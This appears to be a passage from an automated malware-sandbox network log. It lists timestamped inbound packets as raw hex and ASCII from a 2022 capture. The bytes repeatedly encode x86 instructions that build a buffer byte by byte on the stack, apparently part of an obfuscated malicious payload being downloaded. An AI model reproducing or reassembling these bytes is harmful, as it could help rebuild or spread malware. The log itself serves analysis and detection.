2022-05-16 08:29:53 UTC	5085	IN	Data Raw: 4a fe ff e6 c6 85 44 4a fe ff 12 c6 85 45 4a fe ff d4 c6 85 46 4a fe ff e1 c6 85 47 4a fe ff bc c6 85 48 4a fe ff bb c6 85 49 4a fe ff 2e c6 85 4a 4a fe ff c8 c6 85 4b 4a fe ff 2b c6 85 4c 4a fe ff e3 c6 85 4d 4a fe ff 54 c6 85 4e 4a fe ff da c6 85 4f 4a fe ff f5 c6 85 50 4a fe ff 67 c6 85 51 4a fe ff 65 c6 85 52 4a fe ff 98 c6 85 53 4a fe ff e6 c6 85 54 4a fe ff 97 c6 85 55 4a fe ff 2b c6 85 56 4a fe ff 5a c6 85 57 4a fe ff 14 c6 85 58 4a fe ff 39 c6 85 59 4a fe ff c9 c6 85 5a 4a fe ff e1 c6 85 5b 4a fe ff ef c6 85 5c 4a fe ff c5 c6 85 5d 4a fe ff 42 c6 85 5e 4a fe ff c0 c6 85 5f 4a fe ff ca c6 85 60 4a fe ff e6 c6 85 61 4a fe ff 3a c6 85 62 4a fe ff 00 c6 85 63 4a fe ff b5 c6 85 64 4a fe ff 42 c6 85 65 4a fe ff 23 c6 85 66 4a fe ff 4c c6 85 67 4a fe ff Data Ascii: JDJEJFJGJHJIJ.JJKJ+LJMJTNJOJPJgQJeRJSJTJUJ+VJZWJXJ9YJZJ[J\J]JB^J_J`JaJ:bJcJdJBeJ#fJLgJ
2022-05-16 08:29:53 UTC	5101	IN	Data Raw: c6 85 68 53 fe ff 15 c6 85 69 53 fe ff 4d c6 85 6a 53 fe ff a7 c6 85 6b 53 fe ff 94 c6 85 6c 53 fe ff 8e c6 85 6d 53 fe ff 0e c6 85 6e 53 fe ff a1 c6 85 6f 53 fe ff 8a c6 85 70 53 fe ff 07 c6 85 71 53 fe ff 20 c6 85 72 53 fe ff 14 c6 85 73 53 fe ff 1d c6 85 74 53 fe ff 8d c6 85 75 53 fe ff 2f c6 85 76 53 fe ff 67 c6 85 77 53 fe ff 2c c6 85 78 53 fe ff 6b c6 85 79 53 fe ff 1e c6 85 7a 53 fe ff 18 c6 85 7b 53 fe ff e1 c6 85 7c 53 fe ff 23 c6 85 7d 53 fe ff f6 c6 85 7e 53 fe ff 04 c6 85 7f 53 fe ff 43 c6 85 80 53 fe ff 76 c6 85 81 53 fe ff 2b c6 85 82 53 fe ff 49 c6 85 83 53 fe ff 9b c6 85 84 53 fe ff ba c6 85 85 53 fe ff bf c6 85 86 53 fe ff ed c6 85 87 53 fe ff ab c6 85 88 53 fe ff 27 c6 85 89 53 fe ff f5 c6 85 8a 53 fe ff aa c6 85 8b 53 fe ff 7c c6 85 8c Data Ascii: hSiSMjSkSlSmSnSoSpSqS rSsStSuS/vSgwS,xSkySzS{S\|S#}S~SSCSvS+SISSSSSS'SSS\|
2022-05-16 08:29:53 UTC	5117	IN	Data Raw: fe ff 5a c6 85 8d 5c fe ff 9b c6 85 8e 5c fe ff 32 c6 85 8f 5c fe ff 46 c6 85 90 5c fe ff ca c6 85 91 5c fe ff 10 c6 85 92 5c fe ff 12 c6 85 93 5c fe ff 08 c6 85 94 5c fe ff 7e c6 85 95 5c fe ff 46 c6 85 96 5c fe ff 66 c6 85 97 5c fe ff 86 c6 85 98 5c fe ff f3 c6 85 99 5c fe ff 85 c6 85 9a 5c fe ff 20 c6 85 9b 5c fe ff 0e c6 85 9c 5c fe ff cc c6 85 9d 5c fe ff 12 c6 85 9e 5c fe ff 51 c6 85 9f 5c fe ff 35 c6 85 a0 5c fe ff b7 c6 85 a1 5c fe ff fe c6 85 a2 5c fe ff 2b c6 85 a3 5c fe ff 62 c6 85 a4 5c fe ff 26 c6 85 a5 5c fe ff df c6 85 a6 5c fe ff 85 c6 85 a7 5c fe ff fa c6 85 a8 5c fe ff 3c c6 85 a9 5c fe ff 35 c6 85 aa 5c fe ff af c6 85 ab 5c fe ff 34 c6 85 ac 5c fe ff ea c6 85 ad 5c fe ff 98 c6 85 ae 5c fe ff 46 c6 85 af 5c fe ff 10 c6 85 b0 5c fe ff 62 Data Ascii: Z\\2\F\\\\\~\F\f\\\\ \\\\Q\5\\\+\b\&\\\\<\5\\4\\\F\\b
2022-05-16 08:29:53 UTC	5133	IN	Data Raw: 85 b1 65 fe ff 7a c6 85 b2 65 fe ff fa c6 85 b3 65 fe ff cf c6 85 b4 65 fe ff b8 c6 85 b5 65 fe ff 12 c6 85 b6 65 fe ff 82 c6 85 b7 65 fe ff 75 c6 85 b8 65 fe ff b3 c6 85 b9 65 fe ff 45 c6 85 ba 65 fe ff 59 c6 85 bb 65 fe ff 2e c6 85 bc 65 fe ff ee c6 85 bd 65 fe ff 54 c6 85 be 65 fe ff f6 c6 85 bf 65 fe ff bc c6 85 c0 65 fe ff df c6 85 c1 65 fe ff 73 c6 85 c2 65 fe ff e5 c6 85 c3 65 fe ff c5 c6 85 c4 65 fe ff 04 c6 85 c5 65 fe ff fd c6 85 c6 65 fe ff ee c6 85 c7 65 fe ff 4d c6 85 c8 65 fe ff c8 c6 85 c9 65 fe ff 5f c6 85 ca 65 fe ff 6f c6 85 cb 65 fe ff 63 c6 85 cc 65 fe ff ac c6 85 cd 65 fe ff ab c6 85 ce 65 fe ff a4 c6 85 cf 65 fe ff 84 c6 85 d0 65 fe ff 15 c6 85 d1 65 fe ff cc c6 85 d2 65 fe ff 0b c6 85 d3 65 fe ff b4 c6 85 d4 65 fe ff 8f c6 85 d5 65 Data Ascii: ezeeeeeeueeEeYe.eeTeeeeseeeeeeMee_eoeceeeeeeeeee
2022-05-16 08:29:53 UTC	5149	IN	Data Raw: ff e1 c6 85 d6 6e fe ff 5f c6 85 d7 6e fe ff ac c6 85 d8 6e fe ff 29 c6 85 d9 6e fe ff a0 c6 85 da 6e fe ff c4 c6 85 db 6e fe ff a3 c6 85 dc 6e fe ff c2 c6 85 dd 6e fe ff 03 c6 85 de 6e fe ff b4 c6 85 df 6e fe ff 3a c6 85 e0 6e fe ff 3a c6 85 e1 6e fe ff 02 c6 85 e2 6e fe ff e4 c6 85 e3 6e fe ff 7e c6 85 e4 6e fe ff bd c6 85 e5 6e fe ff 29 c6 85 e6 6e fe ff 3e c6 85 e7 6e fe ff 27 c6 85 e8 6e fe ff bd c6 85 e9 6e fe ff 3f c6 85 ea 6e fe ff 4d c6 85 eb 6e fe ff 00 c6 85 ec 6e fe ff 58 c6 85 ed 6e fe ff 70 c6 85 ee 6e fe ff 3d c6 85 ef 6e fe ff f9 c6 85 f0 6e fe ff a5 c6 85 f1 6e fe ff b7 c6 85 f2 6e fe ff 3a c6 85 f3 6e fe ff 59 c6 85 f4 6e fe ff 11 c6 85 f5 6e fe ff 80 c6 85 f6 6e fe ff aa c6 85 f7 6e fe ff 97 c6 85 f8 6e fe ff ba c6 85 f9 6e fe ff cf c6 Data Ascii: n_nn)nnnnnnn:n:nnn~nn)n>n'nn?nMnnXnpn=nnnn:nYnnnnnn
2022-05-16 08:29:53 UTC	5165	IN	Data Raw: fa 77 fe ff 0c c6 85 fb 77 fe ff 76 c6 85 fc 77 fe ff 94 c6 85 fd 77 fe ff 82 c6 85 fe 77 fe ff 41 c6 85 ff 77 fe ff da c6 85 00 78 fe ff bb c6 85 01 78 fe ff eb c6 85 02 78 fe ff f9 c6 85 03 78 fe ff 17 c6 85 04 78 fe ff a8 c6 85 05 78 fe ff a2 c6 85 06 78 fe ff 70 c6 85 07 78 fe ff a3 c6 85 08 78 fe ff 8e c6 85 09 78 fe ff 67 c6 85 0a 78 fe ff ad c6 85 0b 78 fe ff 9d c6 85 0c 78 fe ff 4e c6 85 0d 78 fe ff 09 c6 85 0e 78 fe ff 32 c6 85 0f 78 fe ff 46 c6 85 10 78 fe ff 9b c6 85 11 78 fe ff 6b c6 85 12 78 fe ff de c6 85 13 78 fe ff ee c6 85 14 78 fe ff d3 c6 85 15 78 fe ff 5f c6 85 16 78 fe ff 18 c6 85 17 78 fe ff d7 c6 85 18 78 fe ff 6d c6 85 19 78 fe ff f6 c6 85 1a 78 fe ff 82 c6 85 1b 78 fe ff 9b c6 85 1c 78 fe ff 3a c6 85 1d 78 fe ff 56 c6 85 1e 78 fe Data Ascii: wwvwwwAwxxxxxxxpxxxgxxxNxx2xFxxkxxxx_xxxmxxxx:xVx
2022-05-16 08:29:53 UTC	5181	IN	Data Raw: 7a c6 85 1f 81 fe ff 00 c6 85 20 81 fe ff e4 c6 85 21 81 fe ff f0 c6 85 22 81 fe ff 67 c6 85 23 81 fe ff ec c6 85 24 81 fe ff 75 c6 85 25 81 fe ff 00 c6 85 26 81 fe ff ef c6 85 27 81 fe ff 75 c6 85 28 81 fe ff 25 c6 85 29 81 fe ff 44 c6 85 2a 81 fe ff d4 c6 85 2b 81 fe ff 88 c6 85 2c 81 fe ff 74 c6 85 2d 81 fe ff 4c c6 85 2e 81 fe ff bc c6 85 2f 81 fe ff 79 c6 85 30 81 fe ff 47 c6 85 31 81 fe ff bc c6 85 32 81 fe ff ea c6 85 33 81 fe ff 6f c6 85 34 81 fe ff 32 c6 85 35 81 fe ff 4d c6 85 36 81 fe ff e4 c6 85 37 81 fe ff 03 c6 85 38 81 fe ff ba c6 85 39 81 fe ff 01 c6 85 3a 81 fe ff 2c c6 85 3b 81 fe ff 7d c6 85 3c 81 fe ff ae c6 85 3d 81 fe ff 79 c6 85 3e 81 fe ff 38 c6 85 3f 81 fe ff 48 c6 85 40 81 fe ff b7 c6 85 41 81 fe ff cf c6 85 42 81 fe ff 41 c6 85 Data Ascii: z !"g#$u%&'u(%)D*+,t-L./y0G123o425M6789:,;}<=y>8?H@ABA
2022-05-16 08:29:53 UTC	5197	IN	Data Raw: 8a fe ff 00 c6 85 44 8a fe ff 07 c6 85 45 8a fe ff b5 c6 85 46 8a fe ff b2 c6 85 47 8a fe ff ee c6 85 48 8a fe ff 14 c6 85 49 8a fe ff c5 c6 85 4a 8a fe ff 2e c6 85 4b 8a fe ff 01 c6 85 4c 8a fe ff 96 c6 85 4d 8a fe ff 3d c6 85 4e 8a fe ff 71 c6 85 4f 8a fe ff 47 c6 85 50 8a fe ff 17 c6 85 51 8a fe ff c1 c6 85 52 8a fe ff ee c6 85 53 8a fe ff c7 c6 85 54 8a fe ff d0 c6 85 55 8a fe ff 28 c6 85 56 8a fe ff b8 c6 85 57 8a fe ff bd c6 85 58 8a fe ff b7 c6 85 59 8a fe ff 3d c6 85 5a 8a fe ff 27 c6 85 5b 8a fe ff eb c6 85 5c 8a fe ff 3e c6 85 5d 8a fe ff 3c c6 85 5e 8a fe ff 70 c6 85 5f 8a fe ff e6 c6 85 60 8a fe ff 2f c6 85 61 8a fe ff 90 c6 85 62 8a fe ff 24 c6 85 63 8a fe ff 7e c6 85 64 8a fe ff 2c c6 85 65 8a fe ff d3 c6 85 66 8a fe ff 73 c6 85 67 8a fe ff Data Ascii: DEFGHIJ.KLM=NqOGPQRSTU(VWXY=Z'[\>]<^p_`/ab$c~d,efsg
2022-05-16 08:29:53 UTC	5213	IN	Data Raw: c6 85 68 93 fe ff 4c c6 85 69 93 fe ff 78 c6 85 6a 93 fe ff 9f c6 85 6b 93 fe ff 1e c6 85 6c 93 fe ff 23 c6 85 6d 93 fe ff 6f c6 85 6e 93 fe ff e9 c6 85 6f 93 fe ff d2 c6 85 70 93 fe ff 66 c6 85 71 93 fe ff c5 c6 85 72 93 fe ff 68 c6 85 73 93 fe ff df c6 85 74 93 fe ff 3c c6 85 75 93 fe ff 72 c6 85 76 93 fe ff 9a c6 85 77 93 fe ff 4b c6 85 78 93 fe ff fe c6 85 79 93 fe ff 24 c6 85 7a 93 fe ff b2 c6 85 7b 93 fe ff 8d c6 85 7c 93 fe ff 8c c6 85 7d 93 fe ff 5c c6 85 7e 93 fe ff 0a c6 85 7f 93 fe ff 88 c6 85 80 93 fe ff 64 c6 85 81 93 fe ff 5b c6 85 82 93 fe ff 2b c6 85 83 93 fe ff 5a c6 85 84 93 fe ff 1c c6 85 85 93 fe ff cd c6 85 86 93 fe ff 40 c6 85 87 93 fe ff 23 c6 85 88 93 fe ff 4c c6 85 89 93 fe ff bc c6 85 8a 93 fe ff 70 c6 85 8b 93 fe ff d0 c6 85 8c Data Ascii: hLixjkl#monopfqrhst<urvwKxy$z{\|}\~d[+Z@#Lp
2022-05-16 08:29:53 UTC	5229	IN	Data Raw: fe ff a7 c6 85 8d 9c fe ff 94 c6 85 8e 9c fe ff c6 c6 85 8f 9c fe ff 87 c6 85 90 9c fe ff 25 c6 85 91 9c fe ff ae c6 85 92 9c fe ff 77 c6 85 93 9c fe ff aa c6 85 94 9c fe ff 90 c6 85 95 9c fe ff 39 c6 85 96 9c fe ff 4c c6 85 97 9c fe ff 97 c6 85 98 9c fe ff 66 c6 85 99 9c fe ff 2c c6 85 9a 9c fe ff ac c6 85 9b 9c fe ff 9e c6 85 9c 9c fe ff 60 c6 85 9d 9c fe ff 75 c6 85 9e 9c fe ff b7 c6 85 9f 9c fe ff d2 c6 85 a0 9c fe ff 97 c6 85 a1 9c fe ff 40 c6 85 a2 9c fe ff 76 c6 85 a3 9c fe ff 2b c6 85 a4 9c fe ff c6 c6 85 a5 9c fe ff 54 c6 85 a6 9c fe ff 12 c6 85 a7 9c fe ff bb c6 85 a8 9c fe ff 1d c6 85 a9 9c fe ff aa c6 85 aa 9c fe ff 27 c6 85 ab 9c fe ff f5 c6 85 ac 9c fe ff be c6 85 ad 9c fe ff e2 c6 85 ae 9c fe ff 0f c6 85 af 9c fe ff 81 c6 85 b0 9c fe ff 9a Data Ascii: %w9Lf,`u@v+T'
2022-05-16 08:29:53 UTC	5245	IN	Data Raw: 85 b1 a5 fe ff 0e c6 85 b2 a5 fe ff 41 c6 85 b3 a5 fe ff 5c c6 85 b4 a5 fe ff bd c6 85 b5 a5 fe ff a8 c6 85 b6 a5 fe ff bd c6 85 b7 a5 fe ff 44 c6 85 b8 a5 fe ff 42 c6 85 b9 a5 fe ff 0d c6 85 ba a5 fe ff 12 c6 85 bb a5 fe ff 84 c6 85 bc a5 fe ff 68 c6 85 bd a5 fe ff 85 c6 85 be a5 fe ff d0 c6 85 bf a5 fe ff 0d c6 85 c0 a5 fe ff 70 c6 85 c1 a5 fe ff 65 c6 85 c2 a5 fe ff 33 c6 85 c3 a5 fe ff e9 c6 85 c4 a5 fe ff 39 c6 85 c5 a5 fe ff cd c6 85 c6 a5 fe ff 27 c6 85 c7 a5 fe ff df c6 85 c8 a5 fe ff 45 c6 85 c9 a5 fe ff 75 c6 85 ca a5 fe ff b2 c6 85 cb a5 fe ff 59 c6 85 cc a5 fe ff c4 c6 85 cd a5 fe ff 71 c6 85 ce a5 fe ff ce c6 85 cf a5 fe ff f8 c6 85 d0 a5 fe ff 85 c6 85 d1 a5 fe ff 13 c6 85 d2 a5 fe ff b2 c6 85 d3 a5 fe ff ad c6 85 d4 a5 fe ff 2f c6 85 d5 a5 Data Ascii: A\DBhpe39'EuYq/
2022-05-16 08:29:53 UTC	5261	IN	Data Raw: ff 5b c6 85 d6 ae fe ff 9c c6 85 d7 ae fe ff 32 c6 85 d8 ae fe ff 7d c6 85 d9 ae fe ff 4a c6 85 da ae fe ff 6e c6 85 db ae fe ff 25 c6 85 dc ae fe ff 0d c6 85 dd ae fe ff 46 c6 85 de ae fe ff e6 c6 85 df ae fe ff ac c6 85 e0 ae fe ff f6 c6 85 e1 ae fe ff 5c c6 85 e2 ae fe ff c1 c6 85 e3 ae fe ff 0e c6 85 e4 ae fe ff dc c6 85 e5 ae fe ff 06 c6 85 e6 ae fe ff 27 c6 85 e7 ae fe ff a9 c6 85 e8 ae fe ff 0b c6 85 e9 ae fe ff 85 c6 85 ea ae fe ff 61 c6 85 eb ae fe ff 9b c6 85 ec ae fe ff 87 c6 85 ed ae fe ff 6b c6 85 ee ae fe ff 24 c6 85 ef ae fe ff 67 c6 85 f0 ae fe ff 0b c6 85 f1 ae fe ff 75 c6 85 f2 ae fe ff 31 c6 85 f3 ae fe ff ac c6 85 f4 ae fe ff 6d c6 85 f5 ae fe ff 75 c6 85 f6 ae fe ff 88 c6 85 f7 ae fe ff a7 c6 85 f8 ae fe ff e5 c6 85 f9 ae fe ff 17 c6 Data Ascii: [2}Jn%F\'ak$gu1mu
2022-05-16 08:29:53 UTC	5277	IN	Data Raw: fa b7 fe ff 61 c6 85 fb b7 fe ff 2b c6 85 fc b7 fe ff 0f c6 85 fd b7 fe ff 03 c6 85 fe b7 fe ff 36 c6 85 ff b7 fe ff 6d c6 85 00 b8 fe ff 5a c6 85 01 b8 fe ff 32 c6 85 02 b8 fe ff fa c6 85 03 b8 fe ff 0d c6 85 04 b8 fe ff 4c c6 85 05 b8 fe ff 6f c6 85 06 b8 fe ff 3c c6 85 07 b8 fe ff 29 c6 85 08 b8 fe ff 3e c6 85 09 b8 fe ff 6f c6 85 0a b8 fe ff 7e c6 85 0b b8 fe ff 36 c6 85 0c b8 fe ff ed c6 85 0d b8 fe ff 59 c6 85 0e b8 fe ff e1 c6 85 0f b8 fe ff df c6 85 10 b8 fe ff 3c c6 85 11 b8 fe ff b1 c6 85 12 b8 fe ff 64 c6 85 13 b8 fe ff ba c6 85 14 b8 fe ff 5a c6 85 15 b8 fe ff f5 c6 85 16 b8 fe ff 41 c6 85 17 b8 fe ff 6b c6 85 18 b8 fe ff a3 c6 85 19 b8 fe ff 9e c6 85 1a b8 fe ff c5 c6 85 1b b8 fe ff 8a c6 85 1c b8 fe ff 71 c6 85 1d b8 fe ff 8b c6 85 1e b8 fe Data Ascii: a+6mZ2Lo<)>o~6Y<dZAkq
2022-05-16 08:29:53 UTC	5293	IN	Data Raw: 1d c6 85 1f c1 fe ff 8e c6 85 20 c1 fe ff ee c6 85 21 c1 fe ff b2 c6 85 22 c1 fe ff 58 c6 85 23 c1 fe ff cf c6 85 24 c1 fe ff 5e c6 85 25 c1 fe ff 8b c6 85 26 c1 fe ff 68 c6 85 27 c1 fe ff 0d c6 85 28 c1 fe ff 76 c6 85 29 c1 fe ff a3 c6 85 2a c1 fe ff 49 c6 85 2b c1 fe ff 2c c6 85 2c c1 fe ff 0d c6 85 2d c1 fe ff f9 c6 85 2e c1 fe ff 48 c6 85 2f c1 fe ff 09 c6 85 30 c1 fe ff 32 c6 85 31 c1 fe ff 0e c6 85 32 c1 fe ff d7 c6 85 33 c1 fe ff 6b c6 85 34 c1 fe ff de c6 85 35 c1 fe ff ba c6 85 36 c1 fe ff 9f c6 85 37 c1 fe ff 5a c6 85 38 c1 fe ff a0 c6 85 39 c1 fe ff f8 c6 85 3a c1 fe ff ec c6 85 3b c1 fe ff 8a c6 85 3c c1 fe ff ee c6 85 3d c1 fe ff 3c c6 85 3e c1 fe ff 76 c6 85 3f c1 fe ff 07 c6 85 40 c1 fe ff 6d c6 85 41 c1 fe ff fe c6 85 42 c1 fe ff bc c6 85 Data Ascii: !"X#$^%&h'(v)*I+,,-.H/02123k4567Z89:;<=<>v?@mAB
2022-05-16 08:29:53 UTC	5309	IN	Data Raw: ca fe ff 7d c6 85 44 ca fe ff 23 c6 85 45 ca fe ff 64 c6 85 46 ca fe ff c8 c6 85 47 ca fe ff 6c c6 85 48 ca fe ff 46 c6 85 49 ca fe ff f2 c6 85 4a ca fe ff e5 c6 85 4b ca fe ff 85 c6 85 4c ca fe ff 1b c6 85 4d ca fe ff 6f c6 85 4e ca fe ff 1c c6 85 4f ca fe ff 58 c6 85 50 ca fe ff ac c6 85 51 ca fe ff 79 c6 85 52 ca fe ff ad c6 85 53 ca fe ff a4 c6 85 54 ca fe ff ea c6 85 55 ca fe ff 3f c6 85 56 ca fe ff 32 c6 85 57 ca fe ff 43 c6 85 58 ca fe ff a8 c6 85 59 ca fe ff 53 c6 85 5a ca fe ff 23 c6 85 5b ca fe ff 49 c6 85 5c ca fe ff 07 c6 85 5d ca fe ff 83 c6 85 5e ca fe ff e9 c6 85 5f ca fe ff 47 c6 85 60 ca fe ff c0 c6 85 61 ca fe ff 2d c6 85 62 ca fe ff cf c6 85 63 ca fe ff 97 c6 85 64 ca fe ff ca c6 85 65 ca fe ff 31 c6 85 66 ca fe ff 8c c6 85 67 ca fe ff Data Ascii: }D#EdFGlHFIJKLMoNOXPQyRSTU?V2WCXYSZ#[I\]^_G`a-bcde1fg
2022-05-16 08:29:53 UTC	5325	IN	Data Raw: c6 85 68 d3 fe ff d2 c6 85 69 d3 fe ff da c6 85 6a d3 fe ff 1c c6 85 6b d3 fe ff 04 c6 85 6c d3 fe ff 57 c6 85 6d d3 fe ff 9d c6 85 6e d3 fe ff 19 c6 85 6f d3 fe ff 7d c6 85 70 d3 fe ff 27 c6 85 71 d3 fe ff 4b c6 85 72 d3 fe ff 1f c6 85 73 d3 fe ff 69 c6 85 74 d3 fe ff ea c6 85 75 d3 fe ff ab c6 85 76 d3 fe ff 13 c6 85 77 d3 fe ff 51 c6 85 78 d3 fe ff 24 c6 85 79 d3 fe ff 7e c6 85 7a d3 fe ff cd c6 85 7b d3 fe ff 42 c6 85 7c d3 fe ff ca c6 85 7d d3 fe ff 43 c6 85 7e d3 fe ff d7 c6 85 7f d3 fe ff 91 c6 85 80 d3 fe ff ab c6 85 81 d3 fe ff 31 c6 85 82 d3 fe ff e3 c6 85 83 d3 fe ff db c6 85 84 d3 fe ff 67 c6 85 85 d3 fe ff de c6 85 86 d3 fe ff a4 c6 85 87 d3 fe ff 5a c6 85 88 d3 fe ff f2 c6 85 89 d3 fe ff c1 c6 85 8a d3 fe ff 73 c6 85 8b d3 fe ff ba c6 85 8c Data Ascii: hijklWmno}p'qKrsituvwQx$y~z{B\|}C~1gZs
2022-05-16 08:29:53 UTC	5341	IN	Data Raw: fe ff 53 c6 85 8d dc fe ff d2 c6 85 8e dc fe ff ef c6 85 8f dc fe ff eb c6 85 90 dc fe ff 28 c6 85 91 dc fe ff 45 c6 85 92 dc fe ff b6 c6 85 93 dc fe ff 46 c6 85 94 dc fe ff 84 c6 85 95 dc fe ff ff c6 85 96 dc fe ff 38 c6 85 97 dc fe ff 72 c6 85 98 dc fe ff f4 c6 85 99 dc fe ff 27 c6 85 9a dc fe ff f3 c6 85 9b dc fe ff 69 c6 85 9c dc fe ff da c6 85 9d dc fe ff 65 c6 85 9e dc fe ff 0b c6 85 9f dc fe ff 93 c6 85 a0 dc fe ff 37 c6 85 a1 dc fe ff 07 c6 85 a2 dc fe ff 60 c6 85 a3 dc fe ff 51 c6 85 a4 dc fe ff ab c6 85 a5 dc fe ff 5e c6 85 a6 dc fe ff 79 c6 85 a7 dc fe ff 46 c6 85 a8 dc fe ff 05 c6 85 a9 dc fe ff ab c6 85 aa dc fe ff a4 c6 85 ab dc fe ff 50 c6 85 ac dc fe ff f0 c6 85 ad dc fe ff 97 c6 85 ae dc fe ff 83 c6 85 af dc fe ff c5 c6 85 b0 dc fe ff 23 Data Ascii: S(EF8r'ie7`Q^yFP#
2022-05-16 08:29:53 UTC	5357	IN	Data Raw: 85 b1 e5 fe ff 5b c6 85 b2 e5 fe ff e9 c6 85 b3 e5 fe ff 09 c6 85 b4 e5 fe ff a3 c6 85 b5 e5 fe ff 8b c6 85 b6 e5 fe ff d8 c6 85 b7 e5 fe ff b2 c6 85 b8 e5 fe ff e7 c6 85 b9 e5 fe ff 67 c6 85 ba e5 fe ff ec c6 85 bb e5 fe ff a1 c6 85 bc e5 fe ff 6c c6 85 bd e5 fe ff 9e c6 85 be e5 fe ff 28 c6 85 bf e5 fe ff f8 c6 85 c0 e5 fe ff cb c6 85 c1 e5 fe ff 1d c6 85 c2 e5 fe ff 7c c6 85 c3 e5 fe ff bc c6 85 c4 e5 fe ff 89 c6 85 c5 e5 fe ff 63 c6 85 c6 e5 fe ff 0d c6 85 c7 e5 fe ff 1b c6 85 c8 e5 fe ff be c6 85 c9 e5 fe ff c2 c6 85 ca e5 fe ff 2e c6 85 cb e5 fe ff 67 c6 85 cc e5 fe ff eb c6 85 cd e5 fe ff 39 c6 85 ce e5 fe ff 8d c6 85 cf e5 fe ff ba c6 85 d0 e5 fe ff 6b c6 85 d1 e5 fe ff ec c6 85 d2 e5 fe ff d3 c6 85 d3 e5 fe ff bf c6 85 d4 e5 fe ff c4 c6 85 d5 e5 Data Ascii: [gl(\|c.g9k
2022-05-16 08:29:53 UTC	5373	IN	Data Raw: ff 1d c6 85 d6 ee fe ff 6b c6 85 d7 ee fe ff 35 c6 85 d8 ee fe ff 36 c6 85 d9 ee fe ff 03 c6 85 da ee fe ff 02 c6 85 db ee fe ff e5 c6 85 dc ee fe ff 3e c6 85 dd ee fe ff 49 c6 85 de ee fe ff a4 c6 85 df ee fe ff 49 c6 85 e0 ee fe ff d0 c6 85 e1 ee fe ff bf c6 85 e2 ee fe ff 65 c6 85 e3 ee fe ff 59 c6 85 e4 ee fe ff 2c c6 85 e5 ee fe ff 39 c6 85 e6 ee fe ff c3 c6 85 e7 ee fe ff 4e c6 85 e8 ee fe ff cb c6 85 e9 ee fe ff ff c6 85 ea ee fe ff 45 c6 85 eb ee fe ff 75 c6 85 ec ee fe ff dc c6 85 ed ee fe ff 31 c6 85 ee ee fe ff af c6 85 ef ee fe ff 35 c6 85 f0 ee fe ff a6 c6 85 f1 ee fe ff b0 c6 85 f2 ee fe ff 46 c6 85 f3 ee fe ff c5 c6 85 f4 ee fe ff e2 c6 85 f5 ee fe ff cd c6 85 f6 ee fe ff a4 c6 85 f7 ee fe ff b7 c6 85 f8 ee fe ff 5d c6 85 f9 ee fe ff cc c6 Data Ascii: k56>IIeY,9NEu15F]
2022-05-16 08:29:53 UTC	5389	IN	Data Raw: fa f7 fe ff 95 c6 85 fb f7 fe ff d4 c6 85 fc f7 fe ff 09 c6 85 fd f7 fe ff fc c6 85 fe f7 fe ff 82 c6 85 ff f7 fe ff 46 c6 85 00 f8 fe ff ee c6 85 01 f8 fe ff ec c6 85 02 f8 fe ff fa c6 85 03 f8 fe ff dd c6 85 04 f8 fe ff 9c c6 85 05 f8 fe ff 53 c6 85 06 f8 fe ff 1f c6 85 07 f8 fe ff 41 c6 85 08 f8 fe ff ab c6 85 09 f8 fe ff 75 c6 85 0a f8 fe ff 06 c6 85 0b f8 fe ff a1 c6 85 0c f8 fe ff bd c6 85 0d f8 fe ff 96 c6 85 0e f8 fe ff a3 c6 85 0f f8 fe ff af c6 85 10 f8 fe ff ec c6 85 11 f8 fe ff b6 c6 85 12 f8 fe ff 6e c6 85 13 f8 fe ff 85 c6 85 14 f8 fe ff 79 c6 85 15 f8 fe ff 2f c6 85 16 f8 fe ff 81 c6 85 17 f8 fe ff 15 c6 85 18 f8 fe ff 4f c6 85 19 f8 fe ff a8 c6 85 1a f8 fe ff 2b c6 85 1b f8 fe ff 97 c6 85 1c f8 fe ff 6e c6 85 1d f8 fe ff f2 c6 85 1e f8 fe Data Ascii: FSAuny/O+n
2022-05-16 08:29:53 UTC	5405	IN	Data Raw: 4f c6 85 1f 01 ff ff 23 c6 85 20 01 ff ff 04 c6 85 21 01 ff ff 16 c6 85 22 01 ff ff b6 c6 85 23 01 ff ff 3a c6 85 24 01 ff ff 72 c6 85 25 01 ff ff 89 c6 85 26 01 ff ff 68 c6 85 27 01 ff ff 5a c6 85 28 01 ff ff b5 c6 85 29 01 ff ff 93 c6 85 2a 01 ff ff 3a c6 85 2b 01 ff ff 27 c6 85 2c 01 ff ff f5 c6 85 2d 01 ff ff b2 c6 85 2e 01 ff ff c9 c6 85 2f 01 ff ff 01 c6 85 30 01 ff ff 40 c6 85 31 01 ff ff 65 c6 85 32 01 ff ff 38 c6 85 33 01 ff ff f9 c6 85 34 01 ff ff ed c6 85 35 01 ff ff 3e c6 85 36 01 ff ff 7e c6 85 37 01 ff ff 7d c6 85 38 01 ff ff f3 c6 85 39 01 ff ff d1 c6 85 3a 01 ff ff a7 c6 85 3b 01 ff ff df c6 85 3c 01 ff ff 7d c6 85 3d 01 ff ff 8b c6 85 3e 01 ff ff 71 c6 85 3f 01 ff ff 8b c6 85 40 01 ff ff ee c6 85 41 01 ff ff 88 c6 85 42 01 ff ff 20 c6 85 Data Ascii: O# !"#:$r%&h'Z()*:+',-./0@1e28345>6~7}89:;<}=>q?@AB
2022-05-16 08:29:53 UTC	5421	IN	Data Raw: 0a ff ff f7 c6 85 44 0a ff ff f1 c6 85 45 0a ff ff ec c6 85 46 0a ff ff 40 c6 85 47 0a ff ff 8f c6 85 48 0a ff ff 4f c6 85 49 0a ff ff 51 c6 85 4a 0a ff ff 03 c6 85 4b 0a ff ff 84 c6 85 4c 0a ff ff ae c6 85 4d 0a ff ff 05 c6 85 4e 0a ff ff 5c c6 85 4f 0a ff ff ba c6 85 50 0a ff ff 3b c6 85 51 0a ff ff 29 c6 85 52 0a ff ff 50 c6 85 53 0a ff ff 6b c6 85 54 0a ff ff 30 c6 85 55 0a ff ff 49 c6 85 56 0a ff ff 95 c6 85 57 0a ff ff e2 c6 85 58 0a ff ff f7 c6 85 59 0a ff ff 35 c6 85 5a 0a ff ff d7 c6 85 5b 0a ff ff 9d c6 85 5c 0a ff ff 0b c6 85 5d 0a ff ff d6 c6 85 5e 0a ff ff a8 c6 85 5f 0a ff ff 69 c6 85 60 0a ff ff 56 c6 85 61 0a ff ff 46 c6 85 62 0a ff ff 5d c6 85 63 0a ff ff 51 c6 85 64 0a ff ff 9d c6 85 65 0a ff ff e7 c6 85 66 0a ff ff 7a c6 85 67 0a ff ff Data Ascii: DEF@GHOIQJKLMN\OP;Q)RPSkT0UIVWXY5Z[\]^_i`VaFb]cQdefzg
